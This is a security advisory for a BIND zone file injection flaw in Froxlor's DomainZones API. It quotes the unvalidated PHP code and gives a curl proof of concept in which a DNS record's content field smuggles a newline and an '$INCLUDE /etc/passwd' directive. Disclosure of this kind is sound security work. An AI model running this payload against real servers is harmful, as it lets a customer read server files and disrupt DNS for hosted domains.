CVE-2026-30932
Froxlor is vulnerable to BIND zone file injection via unsanitized DNS record content in DomainZones API
Description
## Summary The `DomainZones.add` API endpoint (accessible to customers with DNS enabled) does not validate the `content` field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. `$INCLUDE`) into the zone file that gets written to disk when the DNS rebuild cron job runs. ## Affected Code `lib/Froxlor/Api/Commands/DomainZones.php`, lines 213-214, 253-254, 290-291, 292-293: ```php } elseif ($type == 'LOC' && !empty($content)) { $content = $content; // no validation } ... } elseif ($type == 'RP' && !empty($content)) { $content = $content; // no validation } ... } elseif ($type == 'SSHFP' && !empty($content)) { $content = $content; // no validation } elseif ($type == 'TLSA' && !empty($content)) { $content = $content; // no validation } ``` There is even a TODO comment at line 148 acknowledging this gap: ```php // TODO regex validate content for invalid characters ``` The content is then written directly into the BIND zone file via `DnsEntry::__toString()` (line 83 of `lib/Froxlor/Dns/DnsEntry.php`): ```php return $this->record . "\t" . $this->ttl . "\t" . $this->class . "\t" . $this->type . "\t" ... . $_content . PHP_EOL; ``` And the zone file is written to disk in `lib/Froxlor/Cron/Dns/Bind.php` line 121: ```php fwrite($zonefile_handler, $zoneContent . $subzones); ``` ## PoC As a customer with DNS management enabled and an API key, add a LOC record with injected BIND directives: ```bash curl -s -u "API_KEY:API_SECRET" \ -H 'Content-Type: application/json' \ -d '{"command":"DomainZones.add","params":{"domainname":"example.com","type":"LOC","content":"0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd"}}' \ https://panel.example.com/api.php ``` Alternatively via the web UI, intercept the DNS editor form POST and set `dns_content` to `0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd` and `dns_type` to `LOC`. After the DNS rebuild cron runs, the resulting zone file at `{bindconf_directory}/domains/example.com.zone` will contain: ``` @ 18000 IN LOC 0 0 0 N 0 0 0 E 0 $INCLUDE /etc/passwd ``` BIND will process the `$INCLUDE` directive and attempt to parse `/etc/passwd` as zone data. While most lines will fail to parse as valid records, the file content is readable by the BIND process (running as `bind`/`named` user), confirming file existence and potentially leaking parseable lines as DNS records. ## Impact 1. **Information Disclosure**: The `$INCLUDE` directive lets a customer read world-readable files on the server through the DNS subsystem. The zone content (including included files) is visible to the customer via the `DomainZones.get` API call or the DNS editor in the web UI. 2. **DNS Service Disruption**: Malformed zone content can cause BIND to fail to load the zone, causing DNS outage for the affected domain. Injecting `$GENERATE` directives could create massive record sets for amplification attacks. 3. **Zone Data Manipulation**: Arbitrary DNS records can be injected by breaking out of the current record line with newlines, allowing the customer to create records that were not intended.